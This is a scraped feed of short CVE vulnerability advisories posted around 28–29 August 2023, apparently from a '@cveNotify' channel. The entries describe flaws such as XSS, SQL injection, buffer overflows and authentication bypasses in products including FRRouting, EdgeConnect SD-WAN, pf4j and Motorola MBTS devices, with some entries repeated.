🚨 CVE-2023-39663Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern.🎖@cveNotify |
|
| 2023-08-29 22:58:30 |
🚨 CVE-2023-39678A cross-site scripting (XSS) vulnerability in the device web interface (Log Query page) of BDCOM OLT P3310D-2AC 10.1.0F Build 69083 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter.🎖@cveNotify |
|
| 2023-08-29 22:58:29 |
🚨 CVE-2023-3253An improper authorization vulnerability exists where an authenticated, low privileged remote attacker could view a list of all the users available in the application.🎖@cveNotify |
|
| 2023-08-29 22:58:28 |
🚨 CVE-2023-4572Use after free in MediaStream in Google Chrome prior to 116.0.5845.140 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-29 22:58:23 |
🚨 CVE-2023-34039Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.🎖@cveNotify |
|
| 2023-08-29 22:58:22 |
🚨 CVE-2023-39522goauthentik is an open-source Identity Provider. In affected versions using a recovery flow with an identification stage an attacker is able to determine if a username exists. Only setups configured with a recovery flow are impacted by this. Anyone with a user account on a system with the recovery flow described above is susceptible to having their username/email revealed as existing. An attacker can easily enumerate and check users' existence using the recovery flow, as a clear message is shown when a user doesn't exist. Depending on configuration this can either be done by username, email, or both. This issue has been addressed in versions 2023.5.6 and 2023.6.2. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-08-29 22:58:21 |
🚨 CVE-2023-3251A pass-back vulnerability exists where an authenticated, remote attacker with administrator privileges could uncover stored SMTP credentials within the Nessus application.This issue affects Nessus: before 10.6.0.🎖@cveNotify |
|
| 2023-08-29 22:58:20 |
🚨 CVE-2023-3252An arbitrary file write vulnerability exists where an authenticated, remote attacker with administrator privileges could alter logging variables to overwrite arbitrary files on the remote host with log data, which could lead to a denial of service condition.🎖@cveNotify |
|
| 2023-08-29 22:58:16 |
🚨 CVE-2023-37428A vulnerability in the EdgeConnect SD-WAN Orchestrator web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-08-29 22:58:15 |
🚨 CVE-2023-37427A vulnerability in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-08-29 22:58:14 |
🚨 CVE-2023-39578A stored cross-site scripting (XSS) vulnerability in the Create function of Zenario CMS v9.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu navigation text field.🎖@cveNotify |
|
| 2023-08-29 22:58:13 |
🚨 CVE-2023-37434Multiple vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the EdgeConnect SD-WAN Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to the exposure and corruption of sensitive data controlled by the EdgeConnect SD-WAN Orchestrator host.🎖@cveNotify |
|
| 2023-08-29 20:58:18 |
🚨 CVE-2023-38283In OpenBGPD before 8.1, incorrect handling of BGP update data (length of path attributes) set by a potentially distant remote actor may cause the system to incorrectly reset a session. This is fixed in OpenBSD 7.3 errata 006.🎖@cveNotify |
|
| 2023-08-29 20:58:17 |
🚨 CVE-2023-41362MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP.🎖@cveNotify |
|
| 2023-08-29 18:58:30 |
🚨 CVE-2023-4513BT SDP dissector memory leak in Wireshark 4.0.0 to 4.0.7 and 3.6.0 to 3.6.15 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-08-29 18:58:26 |
🚨 CVE-2023-4511BT SDP dissector infinite loop in Wireshark 4.0.0 to 4.0.7 and 3.6.0 to 3.6.15 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-08-29 18:58:25 |
🚨 CVE-2023-40763User enumeration is found in PHPJabbers Taxi Booking Script v2.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-29 18:58:24 |
🚨 CVE-2023-39708A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.🎖@cveNotify |
|
| 2023-08-29 18:58:21 |
🚨 CVE-2023-40764User enumeration is found in PHP Jabbers Car Rental Script v3.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-29 18:58:20 |
🚨 CVE-2023-40766User enumeration is found in in PHPJabbers Ticket Support Script v3.2. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-29 18:58:19 |
🚨 CVE-2023-40767User enumeration is found in in PHPJabbers Make an Offer Widget v1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-29 18:58:18 |
🚨 CVE-2023-40756User enumeration is found in PHPJabbers Callback Widget v1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-29 17:58:27 |
🚨 CVE-2023-37439Multiple vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the EdgeConnect SD-WAN Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to the exposure and corruption of sensitive data controlled by the EdgeConnect SD-WAN Orchestrator host.🎖@cveNotify |
|
| 2023-08-29 17:58:26 |
🚨 CVE-2023-37438Multiple vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the EdgeConnect SD-WAN Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to the exposure and corruption of sensitive data controlled by the EdgeConnect SD-WAN Orchestrator host.🎖@cveNotify |
|
| 2023-08-29 17:58:25 |
🚨 CVE-2021-43171Improper verification of applications' cryptographic signatures in the /e/OS app store client App Lounge before 0.19q allows attackers in control of the application server to install malicious applications on user's systems by altering the server's API response.🎖@cveNotify |
|
| 2023-08-29 17:58:23 |
🚨 CVE-2023-40282** UNSUPPPORTED WHEN ASSIGNED ** Improper authentication vulnerability in Rakuten WiFi Pocket all versions allows a network-adjacent attacker to log in to the product's Management Screen. As a result, sensitive information may be obtained and/or the settings may be changed.🎖@cveNotify |
|
| 2023-08-29 17:58:22 |
🚨 CVE-2023-4041Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Out-of-bounds Write, Download of Code Without Integrity Check vulnerability in Silicon Labs Gecko Bootloader on ARM (Firmware Update File Parser modules) allows Code Injection, Authentication Bypass.This issue affects "Standalone" and "Application" versions of Gecko Bootloader.🎖@cveNotify |
|
| 2023-08-29 17:58:21 |
🚨 CVE-2023-39985** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** Out-of-bounds Write vulnerability in Hitachi EH-VIEW (Designer) allows local attackers to potentially execute arbitray code on affected EH-VIEW installations. User interaction is required to exploit the vulnerabilities in that the user must open a malicious file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-08-29 14:58:22 |
🚨 CVE-2023-40787In SpringBlade V3.6.0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.🎖@cveNotify |
|
| 2023-08-29 14:58:21 |
🚨 CVE-2023-23770Motorola MBTS Site Controller accepts hard-coded backdoor password. The Motorola MBTS Site Controller Man Machine Interface (MMI), allowing for service technicians to diagnose and configure the device, accepts a hard-coded backdoor password that cannot be changed or disabled.🎖@cveNotify |
|
| 2023-08-29 14:58:20 |
🚨 CVE-2023-23771Motorola MBTS Base Radio accepts hard-coded backdoor password. The Motorola MBTS Base Radio Man Machine Interface (MMI), allowing for service technicians to diagnose and configure the device, accepts a hard-coded backdoor password that cannot be changed or disabled.🎖@cveNotify |
|
| 2023-08-29 14:58:19 |
🚨 CVE-2023-23772Motorola MBTS Site Controller fails to check firmware update authenticity. The Motorola MBTS Site Controller lacks cryptographic signature validation for firmware update packages, allowing an authenticated attacker to gain arbitrary code execution, extract secret key material, and/or leave a persistent implant on the device.🎖@cveNotify |
|
| 2023-08-29 14:58:15 |
🚨 CVE-2023-23774Motorola EBTS/MBTS Site Controller drops to debug prompt on unhandled exception. The Motorola MBTS Site Controller exposes a debug prompt on the device's serial port in case of an unhandled exception. This allows an attacker with physical access that is able to trigger such an exception to extract secret key material and/or gain arbitrary code execution on the device.🎖@cveNotify |
|
| 2023-08-29 14:58:13 |
🚨 CVE-2023-37436Multiple vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the EdgeConnect SD-WAN Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to the exposure and corruption of sensitive data controlled by the EdgeConnect SD-WAN Orchestrator host.🎖@cveNotify |
|
| 2023-08-29 14:58:12 |
🚨 CVE-2023-37435Multiple vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the EdgeConnect SD-WAN Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to the exposure and corruption of sensitive data controlled by the EdgeConnect SD-WAN Orchestrator host.🎖@cveNotify |
|
| 2023-08-29 10:58:32 |
🚨 CVE-2023-41360An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c can read the initial byte of the ORF header in an ahead-of-stream situation.🎖@cveNotify |
|
| 2023-08-29 10:58:31 |
🚨 CVE-2023-41361An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.🎖@cveNotify |
|
| 2023-08-29 10:58:30 |
🚨 CVE-2023-34724An issue was discovered in TECHView LA5570 Wireless Gateway 1.0.19_T53, allows physical attackers to gain escalated privileges via the UART interface.🎖@cveNotify |
|
| 2023-08-29 10:58:29 |
🚨 CVE-2023-34725An issue was discovered in TechView LA-5570 Wireless Gateway 1.0.19_T53, allows physical attackers to gain escalated privileges via a telnet connection.🎖@cveNotify |
|
| 2023-08-29 10:58:28 |
🚨 CVE-2023-39059An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.🎖@cveNotify |
|
| 2023-08-29 10:58:27 |
🚨 CVE-2023-40781Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function.🎖@cveNotify |
|
| 2023-08-29 10:58:26 |
🚨 CVE-2023-40825An issue in Perfree PerfreeBlog v.3.1.2 allows a remote attacker to execute arbitrary code via crafted plugin listed in admin/plugin/access/list.🎖@cveNotify |
|
| 2023-08-29 10:58:24 |
🚨 CVE-2023-40827An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the loadpluginPath parameter.🎖@cveNotify |
|
| 2023-08-29 10:58:22 |
🚨 CVE-2023-40828An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the expandIfZip method in the extract function.🎖@cveNotify |
|
| 2023-08-29 10:58:21 |
🚨 CVE-2023-40857Buffer Overflow vulnerability in VirusTotal yara v.4.3.2 allows a remote attacker to execute arbtirary code via the yr_execute_cod function in the exe.c component.🎖@cveNotify |
|
| 2023-08-29 10:58:20 |
🚨 CVE-2023-40997Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via a crafted packet.🎖@cveNotify |
|
| 2023-08-29 10:58:19 |
🚨 CVE-2023-40998Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via the packet size component.🎖@cveNotify |
|
| 2023-08-29 10:58:18 |
🚨 CVE-2023-41005An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php🎖@cveNotify |
|
| 2023-08-29 10:58:17 |
🚨 CVE-2023-4569A memory leak flaw was found in nft_set_catchall_flush in net/netfilter/nf_tables_api.c in the Linux Kernel. This issue may allow a local attacker to cause a double-deactivations of catchall elements, which results in a memory leak.🎖@cveNotify |
|
| 2023-08-29 10:58:16 |
🚨 CVE-2023-39650Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.🎖@cveNotify |
|
| 2023-08-29 10:58:15 |
🚨 CVE-2023-35785Zoho ManageEngine ADManager Plus through 7186 is vulnerable to 2FA bypass.🎖@cveNotify |
|
| 2023-08-29 10:58:14 |
🚨 CVE-2023-39348Spinnaker is an open source, multi-cloud continuous delivery platform. Log output when updating GitHub status is improperly set to FULL always. It's recommended to apply the patch and rotate the GitHub token used for github status notifications. Given that this would output github tokens to a log system, the risk is slightly higher than a "low" since token exposure could grant elevated access to repositories outside of control. If using READ restricted tokens, the exposure is such that the token itself could be used to access resources otherwise restricted from reads. This only affects users of GitHub Status Notifications. This issue has been addressed in pull request 1316. Users are advised to upgrade. Users unable to upgrade should disable GH Status Notifications, Filter their logs for Echo log data and use read-only tokens that are limited in scope.🎖@cveNotify |
|
| 2023-08-29 10:58:13 |
🚨 CVE-2023-39578A stored cross-site scripting (XSS) vulnerability in the Create function of Zenario CMS v9.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu navigation text field.🎖@cveNotify |
|
| 2023-08-29 10:58:12 |
🚨 CVE-2023-41109SmartNode SN200 (aka SN200) 3.21.2-23021 allows unauthenticated OS Command Injection.🎖@cveNotify |
|
| 2023-08-29 06:58:34 |
🚨 CVE-2023-30435IBM Security Guardium 11.3, 11.4, and 11.5 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 252291.🎖@cveNotify |
|
| 2023-08-29 06:58:33 |
🚨 CVE-2023-30437IBM Security Guardium 11.3, 11.4, and 11.5 could allow an unauthorized user to enumerate usernames by sending a specially crafted HTTP request. IBM X-Force ID: 252293.🎖@cveNotify |
|
| 2023-08-29 06:58:32 |
🚨 CVE-2023-33852IBM Security Guardium 11.4 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 257614.🎖@cveNotify |
|
| 2023-08-29 06:58:31 |
🚨 CVE-2023-38730IBM Storage Copy Data Management 2.2.0.0 through 2.2.19.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 262268.🎖@cveNotify |
|
| 2023-08-29 06:58:27 |
🚨 CVE-2023-4557A vulnerability classified as critical has been found in SourceCodester Inventory Management System 1.0. Affected is an unknown function of the file app/ajax/search_purchase_paymen_report.php. The manipulation of the argument customer leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238158 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-29 06:58:26 |
🚨 CVE-2023-41358An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero.🎖@cveNotify |
|
| 2023-08-29 06:58:25 |
🚨 CVE-2023-41359An issue was discovered in FRRouting FRR through 9.0. There is an out-of-bounds read in bgp_attr_aigp_valid in bgpd/bgp_attr.c because there is no check for the availability of two bytes during AIGP validation.🎖@cveNotify |
|
| 2023-08-29 06:58:24 |
🚨 CVE-2023-41360An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c can read the initial byte of the ORF header in an ahead-of-stream situation.🎖@cveNotify |
|
| 2023-08-29 06:58:21 |
🚨 CVE-2023-41361An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.🎖@cveNotify |
|
| 2023-08-29 06:58:20 |
🚨 CVE-2023-3180A flaw was found in the QEMU virtual crypto device while handling data encryption/decryption requests in virtio_crypto_handle_sym_req. There is no check for the value of `src_len` and `dst_len` in virtio_crypto_sym_op_helper, potentially leading to a heap buffer overflow when the two values differ.🎖@cveNotify |
|
| 2023-08-29 06:58:19 |
🚨 CVE-2023-0664A flaw was found in the QEMU Guest Agent service for Windows. A local unprivileged user may be able to manipulate the QEMU Guest Agent's Windows installer via repair custom actions to elevate their privileges on the system.🎖@cveNotify |
|
| 2023-08-29 06:58:18 |
🚨 CVE-2023-1995Insufficient Logging vulnerability in Hitachi HiRDB Server, HiRDB Server With Addtional Function, HiRDB Structured Data Access Facility.This issue affects HiRDB Server: before 09-60-39, before 09-65-23, before 10-01-10, before 10-03-12, before 10-04-06, before 10-05-06, before 10-06-02; HiRDB Server With Addtional Function: before 09-60-2M, before 09-65-/W; HiRDB Structured Data Access Facility: before 09-60-39, before 10-03-12, before 10-04-06, before 10-06-02.🎖@cveNotify |
|
| 2023-08-29 06:58:14 |
🚨 CVE-2023-40252Improper Control of Generation of Code ('Code Injection') vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Replace Trusted Executable.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-29 06:58:13 |
🚨 CVE-2023-40254Download of Code Without Integrity Check vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Malicious Software Update.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-29 06:58:12 |
🚨 CVE-2023-28980A Use After Free vulnerability in the routing protocol daemon of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated attacker with low privileges to cause Denial of Service (DoS). In a rib sharding scenario the rpd process will crash shortly after specific CLI command is issued. This issue is more likely to occur in a scenario with high route scale (>1M routes).This issue affects:Juniper Networks Junos OS * 20.2 version 20.2R3-S5 and later versions prior to 20.2R3-S6; * 20.3 version 20.3R3-S2 and later versions prior to 20.3R3-S5; * 20.4 version 20.4R3-S1 and later versions prior to 20.4R3-S4 * 21.1 version 21.1R3 and later versions prior to 21.1R3-S3; * 21.2 version 21.2R1-S2, 21.2R2-S1 and later versions prior to 21.2R3-S2; * 21.3 version 21.3R2 and later versions prior to 21.3R3; * 21.4 versions prior to 21.4R2-S1, 21.4R3; * 22.1 versions prior to 22.1R2.Juniper Networks Junos OS Evolved * 20.4-EVO version 20.4R3-S1-EVO and later versions prior to 20.4R3-S6-EVO; * 21.2-EVO version 21.2R1-S2-EVO and later versions prior to 21.2R3-S4-EVO; * 21.3-EVO version 21.3R2-EVO and later versions prior to 21.3R3-S1-EVO; * 21.4-EVO versions prior to 21.4R2-S1-EVO, 21.4R3-EVO; * 22.1-EVO versions prior to 22.1R2-EVO.🎖@cveNotify |
|
| 2023-08-29 00:58:28 |
🚨 CVE-2023-39650Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.🎖@cveNotify |
|
| 2023-08-29 00:58:27 |
🚨 CVE-2023-34724An issue was discovered in TECHView LA5570 Wireless Gateway 1.0.19_T53, allows physical attackers to gain escalated privileges via the UART interface.🎖@cveNotify |
|
| 2023-08-29 00:58:26 |
🚨 CVE-2023-34725An issue was discovered in TechView LA-5570 Wireless Gateway 1.0.19_T53, allows physical attackers to gain escalated privileges via a telnet connection.🎖@cveNotify |
|
| 2023-08-29 00:58:25 |
🚨 CVE-2023-39059An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.🎖@cveNotify |
|
| 2023-08-29 00:58:24 |
🚨 CVE-2023-40781Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function.🎖@cveNotify |
|
| 2023-08-29 00:58:22 |
🚨 CVE-2023-40825An issue in Perfree PerfreeBlog v.3.1.2 allows a remote attacker to execute arbitrary code via crafted plugin listed in admin/plugin/access/list.🎖@cveNotify |
|
| 2023-08-29 00:58:21 |
🚨 CVE-2023-40826An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.🎖@cveNotify |
|
| 2023-08-29 00:58:20 |
🚨 CVE-2023-40827An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the loadpluginPath parameter.🎖@cveNotify |
|
| 2023-08-29 00:58:19 |
🚨 CVE-2023-40828An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the expandIfZip method in the extract function.🎖@cveNotify |
|
| 2023-08-29 00:58:18 |
🚨 CVE-2023-40857Buffer Overflow vulnerability in VirusTotal yara v.4.3.2 allows a remote attacker to execute arbtirary code via the yr_execute_cod function in the exe.c component.🎖@cveNotify |
|
| 2023-08-29 00:58:17 |
🚨 CVE-2023-40997Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via a crafted packet.🎖@cveNotify |
|
| 2023-08-29 00:58:16 |
🚨 CVE-2023-40998Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via the packet size component.🎖@cveNotify |
|
| 2023-08-29 00:58:15 |
🚨 CVE-2023-41005An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php🎖@cveNotify |
|
| 2023-08-29 00:58:13 |
🚨 CVE-2023-4569A memory leak flaw was found in nft_set_catchall_flush in net/netfilter/nf_tables_api.c in the Linux Kernel. This issue may allow a local attacker to cause a double-deactivations of catchall elements, which results in a memory leak.🎖@cveNotify |
|
| 2023-08-29 00:58:12 |
🚨 CVE-2023-39017** DISPUTED ** quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument. NOTE: this is disputed by multiple parties because it is not plausible that untrusted user input would reach the code location where injection must occur.🎖@cveNotify |
|
| 2023-08-28 23:58:36 |
🚨 CVE-2020-21699The web server Tengine 2.2.2 developed in the Nginx version from 0.5.6 thru 1.13.2 is vulnerable to an integer overflow vulnerability in the nginx range filter module, resulting in the leakage of potentially sensitive information triggered by specially crafted requests.🎖@cveNotify |
|
| 2023-08-28 23:58:35 |
🚨 CVE-2020-24165An issue was discovered in TCG Accelerator in QEMU 4.2.0, allows local attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-08-28 23:58:31 |
🚨 CVE-2023-39968jupyter-server is the backend for Jupyter web applications. Open Redirect Vulnerability. Maliciously crafted login links to known Jupyter Servers can cause successful login or an already logged-in session to be redirected to arbitrary sites, which should be restricted to Jupyter Server-served URLs. This issue has been addressed in commit `29036259` which is included in release 2.7.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-28 23:58:30 |
🚨 CVE-2023-3699An Improper Privilege Management vulnerability was found in ASUSTOR Data Master (ADM) allows an unprivileged local users to modify the storage devices configuration. Affected products and versions include: ADM 4.0.6.RIS1, 4.1.0 and below as well as ADM 4.2.2.RI61 and below.🎖@cveNotify |
|
| 2023-08-28 23:58:26 |
🚨 CVE-2022-48545An infinite recursion in Catalog::findDestInTree can cause denial of service for xpdf 4.02.🎖@cveNotify |
|
| 2023-08-28 23:58:25 |
🚨 CVE-2023-35785Zoho ManageEngine ADManager Plus through 7186 is vulnerable to 2FA bypass.🎖@cveNotify |
|
| 2023-08-28 23:58:24 |
🚨 CVE-2023-39348Spinnaker is an open source, multi-cloud continuous delivery platform. Log output when updating GitHub status is improperly set to FULL always. It's recommended to apply the patch and rotate the GitHub token used for github status notifications. Given that this would output github tokens to a log system, the risk is slightly higher than a "low" since token exposure could grant elevated access to repositories outside of control. If using READ restricted tokens, the exposure is such that the token itself could be used to access resources otherwise restricted from reads. This only affects users of GitHub Status Notifications. This issue has been addressed in pull request 1316. Users are advised to upgrade. Users unable to upgrade should disable GH Status Notifications, Filter their logs for Echo log data and use read-only tokens that are limited in scope.🎖@cveNotify |
|
| 2023-08-28 23:58:21 |
🚨 CVE-2023-39578A stored cross-site scripting (XSS) vulnerability in the Create function of Zenario CMS v9.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu navigation text field.🎖@cveNotify |
|
| 2023-08-28 23:58:20 |
🚨 CVE-2020-12272OpenDMARC through 1.3.2 and 1.4.x allows attacks that inject authentication results to provide false information about the domain that originated an e-mail message. This is caused by incorrect parsing and interpretation of SPF/DKIM authentication results, as demonstrated by the example.net(.example.com substring.🎖@cveNotify |
|
| 2023-08-28 23:58:19 |
🚨 CVE-2022-48538In Cacti 1.2.19, there is an authentication bypass in the web login functionality because of improper validation in the PHP code: cacti_ldap_auth() allows a zero as the password.🎖@cveNotify |
|
| 2023-08-28 21:58:29 |
🚨 CVE-2023-40755There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.🎖@cveNotify |
|
| 2023-08-28 21:58:23 |
🚨 CVE-2023-40756User enumeration is found in PHPJabbers Callback Widget v1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-28 21:58:22 |
🚨 CVE-2023-40759User enumeration is found in PHP Jabbers Restaurant Booking Script v3.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-28 21:58:21 |
🚨 CVE-2023-40760User enumeration is found in PHP Jabbers Hotel Booking System v4.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.🎖@cveNotify |
|
| 2023-08-28 16:58:20 |
🚨 CVE-2023-2234Union variant confusion allows any malicious BT controller to execute arbitrary code on the Zephyr host.🎖@cveNotify |
|
| 2023-08-28 16:58:19 |
🚨 CVE-2023-39708A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.🎖@cveNotify |
|
| 2023-08-28 16:58:18 |
🚨 CVE-2023-40846Tenda AC6 US_AC6V1.0BR_V15.03.05.16_multi_TD01.bin is vulnerable to Buffer Overflow via function sub_90998.🎖@cveNotify |
|
| 2023-08-28 10:58:29 |
🚨 CVE-2020-19909** DISPUTED ** Integer overflow vulnerability in tool_operate.c in curl 7.65.2 via a large value as the retry delay. NOTE: many parties report that this has no direct security impact on the curl user; however, it may (in theory) cause a denial of service to associated systems or networks if, for example, --retry-delay is misinterpreted as a value much smaller than what was intended. This is not especially plausible because the overflow only happens if the user was trying to specify that curl should wait weeks (or longer) before trying to recover from a transient error.🎖@cveNotify |
|
| 2023-08-28 10:58:28 |
🚨 CVE-2023-27604Apache Airflow Sqoop Provider, versions before 4.0.0, is affected by a vulnerability that allows an attacker pass parameters with the connections, which makes it possible to implement RCE attacks via ‘sqoop import --connect’, obtain airflow server permissions, etc. The attacker needs to be logged in and have authorization (permissions) to create/edit connections. It is recommended to upgrade to a version that is not affected.This issue was reported independently by happyhacking-k, And Xie Jianming and LiuHui of Caiji Sec Team also reported it.🎖@cveNotify |
|
| 2023-08-28 10:58:27 |
🚨 CVE-2023-38030Saho’s attendance devices ADM100 and ADM-100FP have a vulnerability of missing authentication for critical functions. An unauthenticated remote attacker can execute system commands in partial website URLs to read sensitive device information without permissions.🎖@cveNotify |
|
| 2023-08-28 10:58:26 |
🚨 CVE-2023-38029Saho’s attendance devices ADM100 and ADM-100FP has insufficient filtering for special characters and file type within their file uploading function. A unauthenticate remote attacker authenticated can upload and execute arbitrary files to perform arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2023-08-28 10:58:22 |
🚨 CVE-2023-38028Saho’s attendance devices ADM100 and ADM-100FP have insufficient authentication. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication to read system information and operate user's data, but can’t control system or disrupt service.🎖@cveNotify |
|
| 2023-08-28 10:58:21 |
🚨 CVE-2022-43904IBM Security Guardium 11.3 and 11.4 could disclose sensitive information to an attacker due to improper restriction of excessive authentication attempts. IBM X-Force ID: 240895.🎖@cveNotify |
|
| 2023-08-28 10:58:20 |
